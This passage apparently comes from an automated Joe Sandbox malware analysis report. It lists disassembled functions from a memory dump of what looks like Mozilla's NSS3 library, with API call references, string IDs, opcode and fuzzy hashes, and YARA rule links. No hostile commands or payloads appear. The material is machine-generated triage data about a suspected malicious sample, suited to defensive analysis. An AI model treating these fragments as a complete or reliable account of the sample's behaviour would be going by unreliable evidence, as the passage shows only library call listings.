                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 984749767-598938438
                                                                                                                                                                                                                          • Opcode ID: a3f07f5b6ecbbaa28719806c8c9184ede37f48051e130f5c7c3ae89d4990c854
                                                                                                                                                                                                                          • Instruction ID: c7d30e0cb2cf7eb595d905bebda3ed1aae99f0febba214f37d17eb6b744dc29f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3f07f5b6ecbbaa28719806c8c9184ede37f48051e130f5c7c3ae89d4990c854
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AB192B0E092199BCB18CF9DC884EFEBBB1BF49314F144429E485B7B45D774A942CBA4
                                                                                                                                                                                                                          Function 6C462D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __allrem
                                                                                                                                                                                                                          • String ID: @Xl$PXl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$Xl
                                                                                                                                                                                                                          • API String ID: 2933888876-3624889994
                                                                                                                                                                                                                          • Opcode ID: a6552c5c93684acc6b4352eac8ec18c764147572bfc126864bb6c749cdd150ae
                                                                                                                                                                                                                          • Instruction ID: 97c06139c3bc32fb90f5802c877801aede76286e4dfe9e5860c780b6b7afe8c0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6552c5c93684acc6b4352eac8ec18c764147572bfc126864bb6c749cdd150ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5261A071A00705AFDB14CF65DC94FAA7BB1FB49314F10812CE915ABB80EB31AD06CB95
                                                                                                                                                                                                                          Function 6C4E7F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C4E7FB2
                                                                                                                                                                                                                            • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BA51
                                                                                                                                                                                                                            • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BA6B
                                                                                                                                                                                                                            • Part of subcall function 6C46BA40: EnterCriticalSection.KERNEL32 ref: 6C46BA83
                                                                                                                                                                                                                            • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BAA1
                                                                                                                                                                                                                            • Part of subcall function 6C46BA40: _PR_MD_UNLOCK.NSS3 ref: 6C46BAC0
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C4E7FD4
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                            • Part of subcall function 6C4E9430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C4E9466
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C4E801B
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C4E8034
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4E80A2
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4E80C0
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C4E811C
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C4E8134
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
                                                                                                                                                                                                                          • String ID: )
                                                                                                                                                                                                                          • API String ID: 3537756449-2427484129
                                                                                                                                                                                                                          • Opcode ID: 7ca2fec3ce1fb7148dfd02bcd1a9cec299979b1f8e722e87bda68d68e89bb960
                                                                                                                                                                                                                          • Instruction ID: 57eb9e410817098d8eee4ef69d836629d150dc809857a5d65e39993648fdaa8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ca2fec3ce1fb7148dfd02bcd1a9cec299979b1f8e722e87bda68d68e89bb960
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C511971A047049BEB11DB389C01FEBB7B0AF5A31EF06052DD95956B42E731A909C792
                                                                                                                                                                                                                          Function 6C48FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C48FCBD
                                                                                                                                                                                                                          • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C48FCCC
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C48FCEF
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C48FD32
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C48FD46
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000001), ref: 6C48FD51
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C48FD6D
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C48FD84
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                          • API String ID: 183580322-336475711
                                                                                                                                                                                                                          • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                          • Instruction ID: 91b7e9e58499c9b08f27662ba53e48f224bfa92b53b57ed46471695e462ab7f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE31B3B6A032159BFB01CAA49C05FAF77F8AF44319F150128DD15A7B00E7B1EA09C7D2
                                                                                                                                                                                                                          Function 6C470F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C470F62
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C470F84
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,6C48F59B,6C59890C,?), ref: 6C470FA8
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C470FC1
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C470FDB
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C470FEF
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C471001
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C471009
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 2061345354-3315324353
                                                                                                                                                                                                                          • Opcode ID: 4f955fa416b966a6b7c5eae195409bcfd94d74ee1fe2483714fe6a8b8c2d8756
                                                                                                                                                                                                                          • Instruction ID: cd2ef703a75af7cc390d416ada0769d91535c70556cc1c0beb19303859c8eecb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f955fa416b966a6b7c5eae195409bcfd94d74ee1fe2483714fe6a8b8c2d8756
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3721E1B1904344AAE710EF24DC41EEA77B8EF44259F018919FC189A701F732A906CBE2
                                                                                                                                                                                                                          Function 6C476DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,6C477D8F,6C477D8F,?,?), ref: 6C476DC8
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C4CFE08
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C4CFE1D
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C4CFE62
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C477D8F,?,?), ref: 6C476DD5
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FA0,00000000,?,?,?,?,6C477D8F,?,?), ref: 6C476DF7
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C476E35
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C4CFE29
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C4CFE3D
                                                                                                                                                                                                                            • Part of subcall function 6C4CFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C4CFE6F
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C476E4C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FE0,00000000), ref: 6C476E82
                                                                                                                                                                                                                            • Part of subcall function 6C476AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C47B21D,00000000,00000000,6C47B219,?,6C476BFB,00000000,?,00000000,00000000,?,?,?,6C47B21D), ref: 6C476B01
                                                                                                                                                                                                                            • Part of subcall function 6C476AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C476B8A
                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C476F1E
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C476F35
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FE0,00000000), ref: 6C476F6B
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,6C477D8F,?,?), ref: 6C476FE1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 587344769-0
                                                                                                                                                                                                                          • Opcode ID: 4c48124bcf43919a323236c3f8ae43798647fcfef99f2ac91427e61daffe9687
                                                                                                                                                                                                                          • Instruction ID: 0fe247ac02f9263485040941d74ddfb011d7347939321039eb5be1848be25b8e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c48124bcf43919a323236c3f8ae43798647fcfef99f2ac91427e61daffe9687
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF716D71E106469BEB10CF65CD40FEABBB5BF95308F154229E808D7B11E770EA94CBA1
                                                                                                                                                                                                                          Function 6C4B0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4B1057
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4B1085
                                                                                                                                                                                                                          • PK11_GetAllTokens.NSS3 ref: 6C4B10B1
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B1107
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B1172
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B1182
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B11A6
                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C4B11C5
                                                                                                                                                                                                                            • Part of subcall function 6C4B52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B52DF
                                                                                                                                                                                                                            • Part of subcall function 6C4B52C0: EnterCriticalSection.KERNEL32(?), ref: 6C4B52F3
                                                                                                                                                                                                                            • Part of subcall function 6C4B52C0: PR_Unlock.NSS3(?), ref: 6C4B5358
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C4B11D3
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C4B11F3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1549229083-0
                                                                                                                                                                                                                          • Opcode ID: 60c26b1fcfc869f859ffb4e61f25aa072b7ddc197a32db3664ca6451324c8141
                                                                                                                                                                                                                          • Instruction ID: d6707033fdee83706fb600886072264aeeede3056d45eba3eab3fd4dc1cdf00c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60c26b1fcfc869f859ffb4e61f25aa072b7ddc197a32db3664ca6451324c8141
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 436170B4E013459BEB00DF68DC85FAEB7B5AF48348F154128E819BB741EB31E945CBA1
                                                                                                                                                                                                                          Function 6C4BADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
                                                                                                                                                                                                                          • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
                                                                                                                                                                                                                          • free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEF1
                                                                                                                                                                                                                          • free.MOZGLUE(6C49CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C49CDBB,?), ref: 6C4BAF0B
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAF30
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 161582014-0
                                                                                                                                                                                                                          • Opcode ID: 55980e2b6ce546cabeb08cba0a9964858f1cf0bfd8921e9fab2c7f4b5258255c
                                                                                                                                                                                                                          • Instruction ID: 05a5371851abd9097696b3478568f419cec27d16e6b3231ad0e20b5d94c90a5b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55980e2b6ce546cabeb08cba0a9964858f1cf0bfd8921e9fab2c7f4b5258255c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15516CB5A01A01ABDB01DF29D884F5AB7B4BF05319F144668E818ABF11E731F964CBE1
                                                                                                                                                                                                                          Function 6C494CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C49AB7F,?,00000000,?), ref: 6C494CB4
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C49AB7F,?,00000000,?), ref: 6C494CC8
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C49AB7F,?,00000000,?), ref: 6C494CE0
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C49AB7F,?,00000000,?), ref: 6C494CF4
                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?,?,6C49AB7F,?,00000000,?), ref: 6C494D03
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,00000000,?), ref: 6C494D10
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          • PR_Now.NSS3(?,00000000,?), ref: 6C494D26
